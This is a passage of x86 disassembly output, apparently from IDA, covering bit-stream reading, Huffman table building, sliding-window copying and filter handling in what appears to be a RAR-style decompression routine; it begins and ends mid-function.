lea edi, [ebp+var_44C]
rep stosd
lea eax, [ebp+Memory]
push eax ; Memory
push [ebp+var_24] ; int
call sub_9B202D
pop ecx
pop ecx
test eax, eax
jnz short loc_9B03B0
or [ebp+var_430], 0FFFFFFFFh
lea eax, [ebp+Memory]
push eax
call sub_9B215A
pop ecx
test eax, eax
jnz short loc_9B03B0
mov [ebp+var_1C], ebx
push ebx
lea eax, [ebp+Memory]
push eax
call sub_9B221A
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
call sub_9B4F4A
add esp, 0Ch
mov [ebp+var_2C], eax
cmp [ebp+var_28], ebx
jnz short loc_9B03A4
cmp eax, ebx
jz short loc_9B03B0
mov ecx, [ebp+var_1C]
cmp ecx, ebx
jz short loc_9B03A4
mov [ebp+var_20], eax
mov [esi], ecx
jmp short loc_9B03B0
; ---------------------------------------------------------------------------
loc_9B03A4: ; CODE XREF: sub_9B02F5+9B�j
; sub_9B02F5+A6�j
cmp eax, ebx
jz short loc_9B03B0
push eax ; Memory
call free
pop ecx
loc_9B03B0: ; CODE XREF: sub_9B02F5+5C�j
; sub_9B02F5+74�j ...
lea eax, [ebp+Memory]
push eax
call sub_9B239F
pop ecx
jmp short loc_9B03C6
; ---------------------------------------------------------------------------
loc_9B03BF: ; DATA XREF: .text:stru_9A6A88�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9B03C3: ; DATA XREF: .text:stru_9A6A88�o
mov esp, [ebp+ms_exc.old_esp]
loc_9B03C6: ; CODE XREF: sub_9B02F5+2E�j
; sub_9B02F5+C8�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9B02F5 endp
; =============== S U B R O U T I N E =======================================
sub_9B03D3 proc near ; CODE XREF: sub_9B1547+70D�p
; sub_9B1547+84F�p
arg_0 = dword ptr 4
lea ecx, [eax+408AFCh]
mov edx, [ecx]
mov [eax+408B00h], edx
lea edx, [eax+408AF8h]
push esi
mov esi, [edx]
mov [ecx], esi
add eax, 408AF4h
mov ecx, [eax]
mov [edx], ecx
mov ecx, [esp+4+arg_0]
mov [eax], ecx
pop esi
retn
sub_9B03D3 endp
; =============== S U B R O U T I N E =======================================
sub_9B03FD proc near ; CODE XREF: sub_9B1547+59B�p
; sub_9B1547+866�p
arg_0 = dword ptr 4
push esi
mov esi, [eax+40800Ch]
push edi
mov edi, ecx
mov ecx, esi
sub ecx, [esp+8+arg_0]
mov edx, 3FFEFCh
cmp ecx, edx
jnb short loc_9B045A
cmp esi, edx
jnb short loc_9B045A
mov dl, [ecx+eax+8004h]
mov [esi+eax+8004h], dl
inc dword ptr [eax+40800Ch]
mov edx, [eax+40800Ch]
inc ecx
dec edi
jz short loc_9B0490
lea esi, [ecx+eax+8004h]
loc_9B043F: ; CODE XREF: sub_9B03FD+59�j
mov cl, [esi]
mov [edx+eax+8004h], cl
inc dword ptr [eax+40800Ch]
mov edx, [eax+40800Ch]
inc esi
dec edi
jnz short loc_9B043F
jmp short loc_9B0490
; ---------------------------------------------------------------------------
loc_9B045A: ; CODE XREF: sub_9B03FD+17�j
; sub_9B03FD+1B�j
test edi, edi
jz short loc_9B0490
mov esi, 3FFFFFh
push ebx
loc_9B0464: ; CODE XREF: sub_9B03FD+90�j
mov ebx, [eax+40800Ch]
mov edx, ecx
and edx, esi
mov dl, [edx+eax+8004h]
mov [eax+ebx+8004h], dl
mov edx, [eax+40800Ch]
inc ecx
inc edx
and edx, esi
dec edi
mov [eax+40800Ch], edx
jnz short loc_9B0464
pop ebx
loc_9B0490: ; CODE XREF: sub_9B03FD+39�j
; sub_9B03FD+5B�j ...
pop edi
pop esi
retn
sub_9B03FD endp
; =============== S U B R O U T I N E =======================================
sub_9B0493 proc near ; CODE XREF: sub_9B09FF+89�p
; sub_9B0AAE+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
mov eax, [esp+arg_4]
lea edx, [ecx+408008h]
add eax, [edx]
push esi
mov esi, eax
sar esi, 3
add [ecx+408004h], esi
and eax, 7
mov [edx], eax
pop esi
retn
sub_9B0493 endp
; =============== S U B R O U T I N E =======================================
sub_9B04B6 proc near ; CODE XREF: sub_9B09FF+7�p
; sub_9B0AAE+43�p ...
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov eax, [edx+408004h]
push ebx
xor ebx, ebx
add eax, edx
mov bh, [eax+4]
push 8
pop ecx
sub ecx, [edx+408008h]
mov bl, [eax+5]
movzx eax, byte ptr [eax+6]
shl ebx, 8
or ebx, eax
shr ebx, cl
and ebx, 0FFFFh
mov eax, ebx
pop ebx
retn
sub_9B04B6 endp
; =============== S U B R O U T I N E =======================================
sub_9B04E9 proc near ; CODE XREF: sub_9B05B9+16�p
; sub_9B0AAE+21�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
mov ecx, [esi+408018h]
mov eax, [esi+408004h]
push edi
mov edi, ecx
sub edi, eax
jns short loc_9B0508
xor eax, eax
jmp loc_9B05B6
; ---------------------------------------------------------------------------
loc_9B0508: ; CODE XREF: sub_9B04E9+16�j
cmp eax, 4000h
jle short loc_9B0535
test edi, edi
jle short loc_9B0526
lea eax, [eax+esi+4]
push edi ; Size
push eax ; Src
lea eax, [esi+4]
push eax ; Dst
call memmove
add esp, 0Ch
loc_9B0526: ; CODE XREF: sub_9B04E9+28�j
and dword ptr [esi+408004h], 0
mov [esi+408018h], edi
jmp short loc_9B0537
; ---------------------------------------------------------------------------
loc_9B0535: ; CODE XREF: sub_9B04E9+24�j
mov edi, ecx
loc_9B0537: ; CODE XREF: sub_9B04E9+4A�j
mov ecx, [esi+40D7F8h]
push ebx
mov ebx, 8000h
mov eax, ebx
sub eax, edi
and eax, 0FFFFFFF0h
cmp ecx, eax
jnb short loc_9B0550
mov eax, ecx
loc_9B0550: ; CODE XREF: sub_9B04E9+63�j
push eax ; Size
lea eax, [edi+esi+4]
push eax ; Dst
push [esp+14h+arg_0] ; int
call sub_9B4FA3
mov edi, eax
add esp, 0Ch
test edi, edi
jle short loc_9B0574
add [esi+408018h], edi
sub [esi+40D7F8h], edi
loc_9B0574: ; CODE XREF: sub_9B04E9+7D�j
mov eax, [esi+408018h]
lea ecx, [eax-1Eh]
cmp ecx, [esi+408004h]
mov [esi+40801Ch], ecx
jge short loc_9B05AD
lea ecx, [eax+1Eh]
cmp ecx, ebx
jge short loc_9B0597
push 1Eh
pop ecx
jmp short loc_9B059D
; ---------------------------------------------------------------------------
loc_9B0597: ; CODE XREF: sub_9B04E9+A7�j
mov ecx, ebx
sub ecx, eax
jz short loc_9B05AD
loc_9B059D: ; CODE XREF: sub_9B04E9+AC�j
push ecx ; Size
lea eax, [eax+esi+4]
push 0 ; Val
push eax ; Dst
call memset
add esp, 0Ch
loc_9B05AD: ; CODE XREF: sub_9B04E9+A0�j
; sub_9B04E9+B2�j
xor eax, eax
cmp edi, 0FFFFFFFFh
setnz al
pop ebx
loc_9B05B6: ; CODE XREF: sub_9B04E9+1A�j
pop edi
pop esi
retn
sub_9B04E9 endp
; =============== S U B R O U T I N E =======================================
sub_9B05B9 proc near ; CODE XREF: sub_9B3705+E�p
; sub_9B3705+2F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
cmp dword ptr [esi+408004h], 7FE2h
jle short loc_9B05DF
push esi
push [esp+8+arg_0]
call sub_9B04E9
test eax, eax
pop ecx
pop ecx
jnz short loc_9B05DF
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B05DF: ; CODE XREF: sub_9B05B9+F�j
; sub_9B05B9+1F�j
mov eax, [esi+408004h]
mov cl, [eax+esi+4]
inc eax
mov [esi+408004h], eax
movzx eax, cl
pop esi
retn
sub_9B05B9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9B05F5(void *Src,size_t Size)
sub_9B05F5 proc near ; CODE XREF: sub_9B0636+1C�p
; sub_9B0636+2B�p ...
Src = dword ptr 4
Size = dword ptr 8
push esi
push [esp+4+Size] ; Size
mov esi, eax
push [esp+8+Src] ; Src
push dword ptr [esi] ; int
call sub_9B4FFF
add esp, 0Ch
test eax, eax
jle short loc_9B061A
cdq
lea ecx, [esi+40D7BCh]
add [ecx], eax
adc [ecx+4], edx
loc_9B061A: ; CODE XREF: sub_9B05F5+17�j
push [esp+4+Size]
add esi, 40D7F4h
push [esp+8+Src]
push dword ptr [esi]
call sub_9B39E0
add esp, 0Ch
mov [esi], eax
pop esi
retn
sub_9B05F5 endp
; =============== S U B R O U T I N E =======================================
; int __fastcall sub_9B0636(size_t Size)
sub_9B0636 proc near ; CODE XREF: sub_9B06DE+7C�p
; sub_9B06DE+20A�p
push edi
mov edi, ecx
cmp edi, eax
jnb short loc_9B066B
mov ecx, eax
neg ecx
and ecx, 3FFFFFh
lea eax, [esi+eax+8004h]
push ecx ; Size
push eax ; Src
mov eax, esi
call sub_9B05F5
lea eax, [esi+8004h]
push edi ; Size
push eax ; Src
mov eax, esi
call sub_9B05F5
add esp, 10h
pop edi
retn
; ---------------------------------------------------------------------------
loc_9B066B: ; CODE XREF: sub_9B0636+5�j
sub edi, eax
lea eax, [esi+eax+8004h]
push edi ; Size
push eax ; Src
mov eax, esi
call sub_9B05F5
pop ecx
pop ecx
pop edi
retn
sub_9B0636 endp
; =============== S U B R O U T I N E =======================================
sub_9B0681 proc near ; CODE XREF: sub_9B06DE+113�p
; sub_9B06DE+18E�p
cmp dword ptr [edi+18h], 0
push esi
mov esi, eax
jle short loc_9B06DC
mov eax, [esi+40D7BCh]
mov [edi+3Ch], eax
push dword ptr [esi+40D7BCh]
mov eax, [edi+0Ch]
add eax, 24h
push eax
push 0
call sub_9B39C6
mov eax, [esi+40D7BCh]
mov edx, [esi+40D7C0h]
add esp, 0Ch
mov cl, 20h
call __allshr
push eax
mov eax, [edi+0Ch]
add eax, 28h
push eax
push 0
call sub_9B39C6
push edi ; Size
add esi, 40D7CCh
push esi ; int
call sub_9B494C
add esp, 14h
loc_9B06DC: ; CODE XREF: sub_9B0681+7�j
pop esi
retn
sub_9B0681 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B06DE proc near ; CODE XREF: sub_9B1547+4AE�p
; sub_9B1547+733�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
Src = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
and [ebp+var_4], 0
push ebx
push esi
mov esi, eax
mov eax, [esi+408010h]
mov ecx, [esi+40800Ch]
sub ecx, eax
and ecx, 3FFFFFh
cmp dword ptr [esi+40D7ACh], 0
push edi
jbe loc_9B08E2
loc_9B070E: ; CODE XREF: sub_9B06DE+1FE�j
mov ebx, [ebp+var_4]
mov edx, [esi+40D7A8h]
shl ebx, 2
mov edx, [ebx+edx]
test edx, edx
mov [ebp+var_8], edx
jz loc_9B08D0
cmp dword ptr [edx+0Ch], 0
jz short loc_9B0737
and dword ptr [edx+0Ch], 0
jmp loc_9B08D0
; ---------------------------------------------------------------------------
loc_9B0737: ; CODE XREF: sub_9B06DE+4E�j
mov edi, [edx]
mov edx, [edx+4]
mov [ebp+Src], edx
mov edx, edi
sub edx, eax
and edx, 3FFFFFh
cmp edx, ecx
mov [ebp+var_14], edi
jnb loc_9B08D0
cmp eax, edi
jz short loc_9B0772
mov ecx, edi ; Size
call sub_9B0636
mov ecx, [esi+40800Ch]
sub ecx, edi
mov edx, 3FFFFFh
mov eax, edi
and ecx, edx
jmp short loc_9B0777
; ---------------------------------------------------------------------------
loc_9B0772: ; CODE XREF: sub_9B06DE+78�j
mov edx, 3FFFFFh
loc_9B0777: ; CODE XREF: sub_9B06DE+92�j
cmp [ebp+Src], ecx
ja loc_9B08FE
mov ecx, [ebp+Src]
lea eax, [ecx+edi]
and eax, edx
cmp edi, eax
mov [ebp+var_10], eax
jb short loc_9B07CF
test eax, eax
jz short loc_9B07CF
mov eax, edx
sub eax, edi
push eax ; int
mov [ebp+Src], eax
lea eax, [esi+edi+8004h]
push eax ; Src
lea ecx, [esi+40D7CCh]
push 0 ; int
push ecx ; int
call sub_9B3C6E
push [ebp+var_10] ; int
lea eax, [esi+8004h]
push eax ; Src
push [ebp+Src] ; int
lea eax, [esi+40D7CCh]
push eax ; int
call sub_9B3C6E
add esp, 20h
jmp short loc_9B07E9
; ---------------------------------------------------------------------------
loc_9B07CF: ; CODE XREF: sub_9B06DE+AF�j
; sub_9B06DE+B3�j
push ecx ; int
lea ecx, [edi+esi+8004h]
push ecx ; Src
lea eax, [esi+40D7CCh]
push 0 ; int
push eax ; int
call sub_9B3C6E
add esp, 10h
loc_9B07E9: ; CODE XREF: sub_9B06DE+EF�j
mov edi, [ebp+var_8]
add edi, 10h
mov eax, esi
call sub_9B0681
mov eax, [edi+14h]
mov edi, [edi+40h]
mov [ebp+Src], eax
mov eax, [esi+40D7A8h]
push dword ptr [ebx+eax] ; Memory
call sub_9B24D9
mov eax, [esi+40D7A8h]
and dword ptr [ebx+eax], 0
mov eax, [ebp+var_4]
inc eax
cmp eax, [esi+40D7ACh]
pop ecx
jnb loc_9B08B2
mov [ebp+var_8], eax
loc_9B082B: ; CODE XREF: sub_9B06DE+1CE�j
mov eax, [esi+40D7A8h]
mov eax, [ebx+eax+4]
test eax, eax
jz short loc_9B08B2
mov ecx, [ebp+var_14]
cmp [eax], ecx
jnz short loc_9B08B2
cmp [eax+4], edi
jnz short loc_9B08B2
cmp dword ptr [eax+0Ch], 0
jnz short loc_9B08B2
push edi ; int
push [ebp+Src] ; Src
lea eax, [esi+40D7CCh]
push 0 ; int
push eax ; int
call sub_9B3C6E
mov eax, [esi+40D7A8h]
mov edi, [ebx+eax+4]
add edi, 10h
mov eax, esi
call sub_9B0681
mov eax, [edi+14h]
inc [ebp+var_4]
mov edi, [edi+40h]
inc [ebp+var_8]
mov [ebp+Src], eax
mov eax, [ebp+var_4]
mov ebx, eax
mov eax, [esi+40D7A8h]
shl ebx, 2
push dword ptr [ebx+eax] ; Memory
call sub_9B24D9
mov eax, [esi+40D7A8h]
and dword ptr [ebx+eax], 0
mov eax, [ebp+var_8]
add esp, 14h
cmp eax, [esi+40D7ACh]
jb loc_9B082B
loc_9B08B2: ; CODE XREF: sub_9B06DE+144�j
; sub_9B06DE+159�j ...
push edi ; Size
push [ebp+Src] ; Src
mov eax, esi
call sub_9B05F5
mov eax, [ebp+var_10]
pop ecx
pop ecx
mov ecx, [esi+40800Ch]
sub ecx, eax
and ecx, 3FFFFFh
loc_9B08D0: ; CODE XREF: sub_9B06DE+44�j
; sub_9B06DE+54�j ...
inc [ebp+var_4]
mov edx, [ebp+var_4]
cmp edx, [esi+40D7ACh]
jb loc_9B070E
loc_9B08E2: ; CODE XREF: sub_9B06DE+2A�j
mov ecx, [esi+40800Ch] ; Size
call sub_9B0636
mov eax, [esi+40800Ch]
loc_9B08F3: ; CODE XREF: sub_9B06DE+245�j
pop edi
mov [esi+408010h], eax
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B08FE: ; CODE XREF: sub_9B06DE+9C�j
mov edx, [ebp+var_4]
jmp short loc_9B091B
; ---------------------------------------------------------------------------
loc_9B0903: ; CODE XREF: sub_9B06DE+243�j
mov ecx, [esi+40D7A8h]
mov ecx, [ecx+edx*4]
test ecx, ecx
jz short loc_9B091A
cmp dword ptr [ecx+0Ch], 0
jz short loc_9B091A
and dword ptr [ecx+0Ch], 0
loc_9B091A: ; CODE XREF: sub_9B06DE+230�j
; sub_9B06DE+236�j
inc edx
loc_9B091B: ; CODE XREF: sub_9B06DE+223�j
cmp edx, [esi+40D7ACh]
jb short loc_9B0903
jmp short loc_9B08F3
sub_9B06DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0925 proc near ; CODE XREF: sub_9B0AAE+12A�p
; sub_9B0AAE+252�p ...
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
Dst = dword ptr -40h
var_3C = dword ptr -3Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 80h
push ebx
push esi
push edi
push 40h ; Size
xor edi, edi
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call memset
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_4]
mov eax, ebx
shl eax, 2
push eax ; Size
lea eax, [esi+84h]
push edi ; Val
push eax ; Dst
call memset
add esp, 18h
xor ecx, ecx
cmp ebx, edi
jle short loc_9B0976
loc_9B0961: ; CODE XREF: sub_9B0925+4F�j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [ecx+eax]
and eax, 0Fh
lea eax, [ebp+eax*4+Dst]
inc dword ptr [eax]
inc ecx
cmp ecx, ebx
jl short loc_9B0961
loc_9B0976: ; CODE XREF: sub_9B0925+3A�j
lea edx, [esi+44h]
push 0Eh
mov [ebp+Dst], edi
mov [esi+4], edi
mov [edx], edi
mov [ebp+var_80], edi
mov [ebp+arg_4], edi
pop ecx
loc_9B098A: ; CODE XREF: sub_9B0925+99�j
mov eax, [ebp+edi+var_3C]
add eax, [ebp+arg_4]
mov ebx, 0FFFFh
shl eax, 1
mov [ebp+arg_4], eax
shl eax, cl
cmp eax, ebx
jle short loc_9B09A3
mov eax, ebx
loc_9B09A3: ; CODE XREF: sub_9B0925+7A�j
mov ebx, [edx]
mov [edx-3Ch], eax
mov eax, [ebp+edi+Dst]
add eax, ebx
add edx, 4
mov [ebp+edi+var_7C], eax
dec ecx
add edi, 4
cmp ecx, 0FFFFFFFFh
mov [edx], eax
jg short loc_9B098A
mov edx, [ebp+arg_8]
xor ecx, ecx
test edx, edx
jle short loc_9B09F8
loc_9B09C9: ; CODE XREF: sub_9B0925+D1�j
mov eax, [ebp+arg_0]
lea edi, [ecx+eax]
cmp byte ptr [edi], 0
jz short loc_9B09F3
xor eax, eax
mov al, [edi]
and eax, 0Fh
mov eax, [ebp+eax*4+var_80]
mov [esi+eax*4+84h], ecx
xor eax, eax
mov al, [edi]
and eax, 0Fh
lea eax, [ebp+eax*4+var_80]
inc dword ptr [eax]
loc_9B09F3: ; CODE XREF: sub_9B0925+AD�j
inc ecx
cmp ecx, edx
jl short loc_9B09C9
loc_9B09F8: ; CODE XREF: sub_9B0925+A2�j
pop edi
mov [esi], edx
pop esi
pop ebx
leave
retn
sub_9B0925 endp
; =============== S U B R O U T I N E =======================================
sub_9B09FF proc near ; CODE XREF: sub_9B0AAE+160�p
; sub_9B1547+5EB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_9B04B6
mov ebx, [esp+10h+arg_4]
mov edi, eax
and edi, 0FFFEh
cmp edi, [ebx+24h]
pop ecx
jnb short loc_9B0A53
cmp edi, [ebx+14h]
jnb short loc_9B0A3A
cmp edi, [ebx+0Ch]
jnb short loc_9B0A30
cmp edi, [ebx+8]
sbb esi, esi
inc esi
inc esi
jmp short loc_9B0A83
; ---------------------------------------------------------------------------
loc_9B0A30: ; CODE XREF: sub_9B09FF+26�j
cmp edi, [ebx+10h]
sbb esi, esi
add esi, 4
jmp short loc_9B0A83
; ---------------------------------------------------------------------------
loc_9B0A3A: ; CODE XREF: sub_9B09FF+21�j
cmp edi, [ebx+1Ch]
jnb short loc_9B0A49
cmp edi, [ebx+18h]
sbb esi, esi
add esi, 6
jmp short loc_9B0A83
; ---------------------------------------------------------------------------
loc_9B0A49: ; CODE XREF: sub_9B09FF+3E�j
cmp edi, [ebx+20h]
sbb esi, esi
add esi, 8
jmp short loc_9B0A83
; ---------------------------------------------------------------------------
loc_9B0A53: ; CODE XREF: sub_9B09FF+1C�j
cmp edi, [ebx+34h]
jnb short loc_9B0A71
cmp edi, [ebx+2Ch]
jnb short loc_9B0A67
cmp edi, [ebx+28h]
sbb esi, esi
add esi, 0Ah
jmp short loc_9B0A83
; ---------------------------------------------------------------------------
loc_9B0A67: ; CODE XREF: sub_9B09FF+5C�j
cmp edi, [ebx+30h]
sbb esi, esi
add esi, 0Ch
jmp short loc_9B0A83
; ---------------------------------------------------------------------------
loc_9B0A71: ; CODE XREF: sub_9B09FF+57�j
cmp edi, [ebx+3Ch]
jnb short loc_9B0A80
cmp edi, [ebx+38h]
sbb esi, esi
add esi, 0Eh
jmp short loc_9B0A83
; ---------------------------------------------------------------------------
loc_9B0A80: ; CODE XREF: sub_9B09FF+75�j
push 0Fh
pop esi
loc_9B0A83: ; CODE XREF: sub_9B09FF+2F�j
; sub_9B09FF+39�j ...
push esi
push [esp+10h+arg_0]
call sub_9B0493
sub edi, [ebx+esi*4]
pop ecx
pop ecx
push 10h
pop ecx
sub ecx, esi
shr edi, cl
add edi, [ebx+esi*4+44h]
cmp edi, [ebx]
jb short loc_9B0AA3
xor edi, edi
loc_9B0AA3: ; CODE XREF: sub_9B09FF+A0�j
mov eax, [ebx+edi*4+84h]
pop edi
pop esi
pop ebx
retn
sub_9B09FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0AAE proc near ; CODE XREF: sub_9B0D64+44�p
; sub_9B1547+450�p ...
var_1AD = byte ptr -1ADh
Src = byte ptr -1ACh
var_81 = byte ptr -81h
var_45 = byte ptr -45h
var_34 = byte ptr -34h
var_18 = byte ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
mov esi, eax
mov eax, [esi+408018h]
sub eax, 19h
cmp [esi+408004h], eax
jle short loc_9B0ADE
push esi
push [ebp+arg_0]
call sub_9B04E9
test eax, eax
pop ecx
pop ecx
jz loc_9B0D5D
loc_9B0ADE: ; CODE XREF: sub_9B0AAE+1B�j
mov eax, [esi+408008h]
neg eax
and eax, 7
push eax
push esi
call sub_9B0493
push esi
call sub_9B04B6
add esp, 0Ch
test ah, ah
jns short loc_9B0B2C
lea eax, [esi+40D79Ch]
push eax
push esi
push [ebp+arg_0]
mov dword ptr [esi+408020h], 1
add esi, 408B10h
push esi
call sub_9B3705
add esp, 10h
neg eax
sbb eax, eax
neg eax
jmp loc_9B0D5D
; ---------------------------------------------------------------------------
loc_9B0B2C: ; CODE XREF: sub_9B0AAE+4D�j
push ebx
xor ebx, ebx
test ah, 40h
mov [esi+408020h], ebx
mov [esi+408024h], ebx
mov [esi+408028h], ebx
jnz short loc_9B0B5B
push 194h ; Size
lea eax, [esi+40802Ch]
push ebx ; Val
push eax ; Dst
call memset
add esp, 0Ch
loc_9B0B5B: ; CODE XREF: sub_9B0AAE+96�j
push 2
push esi
call sub_9B0493
pop ecx
pop ecx
push edi
loc_9B0B66: ; CODE XREF: sub_9B0AAE+11B�j
push esi
call sub_9B04B6
shr eax, 0Ch
movzx eax, al
push 4
push esi
mov [ebp+var_4], eax
call sub_9B0493
mov eax, [ebp+var_4]
add esp, 0Ch
cmp eax, 0Fh
jnz short loc_9B0BC1
push esi
call sub_9B04B6
shr eax, 0Ch
push 4
push esi
movzx edi, al
call sub_9B0493
add esp, 0Ch
test edi, edi
jnz short loc_9B0BAA
mov [ebp+ebx+var_18], 0Fh
jmp short loc_9B0BC5
; ---------------------------------------------------------------------------
loc_9B0BAA: ; CODE XREF: sub_9B0AAE+F3�j
inc edi
inc edi
jmp short loc_9B0BBA
; ---------------------------------------------------------------------------
loc_9B0BAE: ; CODE XREF: sub_9B0AAE+10E�j
dec edi
cmp ebx, 14h
jnb short loc_9B0BBE
mov [ebp+ebx+var_18], 0
inc ebx
loc_9B0BBA: ; CODE XREF: sub_9B0AAE+FE�j
test edi, edi
jg short loc_9B0BAE
loc_9B0BBE: ; CODE XREF: sub_9B0AAE+104�j
dec ebx
jmp short loc_9B0BC5
; ---------------------------------------------------------------------------
loc_9B0BC1: ; CODE XREF: sub_9B0AAE+D8�j
mov [ebp+ebx+var_18], al
loc_9B0BC5: ; CODE XREF: sub_9B0AAE+FA�j
; sub_9B0AAE+111�j
inc ebx
cmp ebx, 14h
jl short loc_9B0B66
lea eax, [esi+408A20h]
push 14h
push eax
lea eax, [ebp+var_18]
push eax
call sub_9B0925
add esp, 0Ch
xor ebx, ebx
loc_9B0BE2: ; CODE XREF: sub_9B0AAE+222�j
mov eax, [esi+408018h]
sub eax, 5
cmp [esi+408004h], eax
jle short loc_9B0C06
push esi
push [ebp+arg_0]
call sub_9B04E9
test eax, eax
pop ecx
pop ecx
jz loc_9B0D60
loc_9B0C06: ; CODE XREF: sub_9B0AAE+143�j
lea eax, [esi+408A20h]
push eax
push esi
call sub_9B09FF
cmp eax, 10h
pop ecx
pop ecx
jge short loc_9B0C33
mov cl, [ebx+esi+40802Ch]
add cl, al
and cl, 0Fh
mov [ebp+ebx+Src], cl
inc ebx
jmp loc_9B0CCA
; ---------------------------------------------------------------------------
loc_9B0C33: ; CODE XREF: sub_9B0AAE+16A�j
cmp eax, 12h
push esi
jge short loc_9B0C87
cmp eax, 10h
jnz short loc_9B0C4F
call sub_9B04B6
mov edi, eax
shr edi, 0Dh
add edi, 3
push 3
jmp short loc_9B0C5E
; ---------------------------------------------------------------------------
loc_9B0C4F: ; CODE XREF: sub_9B0AAE+18E�j
call sub_9B04B6
mov edi, eax
shr edi, 9
add edi, 0Bh
push 7
loc_9B0C5E: ; CODE XREF: sub_9B0AAE+19F�j
push esi
call sub_9B0493
add esp, 0Ch
jmp short loc_9B0C81
; ---------------------------------------------------------------------------
loc_9B0C69: ; CODE XREF: sub_9B0AAE+1D5�j
dec edi
cmp ebx, 194h
jge short loc_9B0CD6
mov al, [ebp+ebx+var_1AD]
mov [ebp+ebx+Src], al
inc ebx
loc_9B0C81: ; CODE XREF: sub_9B0AAE+1B9�j
test edi, edi
jg short loc_9B0C69
jmp short loc_9B0CCA
; ---------------------------------------------------------------------------
loc_9B0C87: ; CODE XREF: sub_9B0AAE+189�j
jnz short loc_9B0C9A
call sub_9B04B6
mov edi, eax
shr edi, 0Dh
add edi, 3
push 3
jmp short loc_9B0CA9
; ---------------------------------------------------------------------------
loc_9B0C9A: ; CODE XREF: sub_9B0AAE:loc_9B0C87�j
call sub_9B04B6
mov edi, eax
shr edi, 9
add edi, 0Bh
push 7
loc_9B0CA9: ; CODE XREF: sub_9B0AAE+1EA�j
push esi
call sub_9B0493
add esp, 0Ch
jmp short loc_9B0CC6
; ---------------------------------------------------------------------------
loc_9B0CB4: ; CODE XREF: sub_9B0AAE+21A�j
dec edi
cmp ebx, 194h
jge short loc_9B0CD6
mov [ebp+ebx+Src], 0
inc ebx
loc_9B0CC6: ; CODE XREF: sub_9B0AAE+204�j
test edi, edi
jg short loc_9B0CB4
loc_9B0CCA: ; CODE XREF: sub_9B0AAE+180�j
; sub_9B0AAE+1D7�j
cmp ebx, 194h
jl loc_9B0BE2
loc_9B0CD6: ; CODE XREF: sub_9B0AAE+1C2�j
; sub_9B0AAE+20D�j
mov eax, [esi+408004h]
xor edi, edi
inc edi
cmp eax, [esi+408018h]
mov [esi+408014h], edi
jg short loc_9B0D60
push 12Bh
lea eax, [esi+4081C0h]
push eax
lea eax, [ebp+Src]
push eax
call sub_9B0925
push 3Ch
lea eax, [esi+4086F0h]
push eax
lea eax, [ebp+var_81]
push eax
call sub_9B0925
push 11h
lea eax, [esi+408864h]
push eax
lea eax, [ebp+var_45]
push eax
call sub_9B0925
push 1Ch
lea eax, [esi+40892Ch]
push eax
lea eax, [ebp+var_34]
push eax
call sub_9B0925
push 194h ; Size
lea eax, [ebp+Src]
push eax ; Src
add esi, 40802Ch
push esi ; Dst
call memcpy
add esp, 3Ch
mov eax, edi
loc_9B0D5B: ; CODE XREF: sub_9B0AAE+2B4�j
pop edi
pop ebx
loc_9B0D5D: ; CODE XREF: sub_9B0AAE+2A�j
; sub_9B0AAE+79�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_9B0D60: ; CODE XREF: sub_9B0AAE+152�j
; sub_9B0AAE+23D�j
xor eax, eax
jmp short loc_9B0D5B
sub_9B0AAE endp
; =============== S U B R O U T I N E =======================================
sub_9B0D64 proc near ; CODE XREF: sub_9B1547+723�p
arg_0 = dword ptr 4
push ebx
push edi
push esi
xor ebx, ebx
call sub_9B04B6
test ah, ah
pop ecx
jns short loc_9B0D79
xor edi, edi
inc edi
push edi
jmp short loc_9B0D85
; ---------------------------------------------------------------------------
loc_9B0D79: ; CODE XREF: sub_9B0D64+D�j
xor ebx, ebx
inc ebx
and eax, 4000h
mov edi, eax
push 2
loc_9B0D85: ; CODE XREF: sub_9B0D64+13�j
push esi
call sub_9B0493
xor eax, eax
test edi, edi
setz al
test ebx, ebx
pop ecx
pop ecx
mov [esi+408014h], eax
jnz short loc_9B0DB7
test edi, edi
jz short loc_9B0DB2
push [esp+8+arg_0]
mov eax, esi
call sub_9B0AAE
test eax, eax
pop ecx
jz short loc_9B0DB7
loc_9B0DB2: ; CODE XREF: sub_9B0D64+3C�j
xor eax, eax
inc eax
jmp short loc_9B0DB9
; ---------------------------------------------------------------------------
loc_9B0DB7: ; CODE XREF: sub_9B0D64+38�j
; sub_9B0D64+4C�j
xor eax, eax
loc_9B0DB9: ; CODE XREF: sub_9B0D64+51�j
pop edi
pop ebx
retn
sub_9B0D64 endp
; =============== S U B R O U T I N E =======================================
sub_9B0DBC proc near ; CODE XREF: sub_9B0E04+36�p
; sub_9B143F+C5�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
lea edi, [esi+40D7B0h]
mov eax, [edi]
test eax, eax
jz short loc_9B0DD9
push eax ; Memory
call free
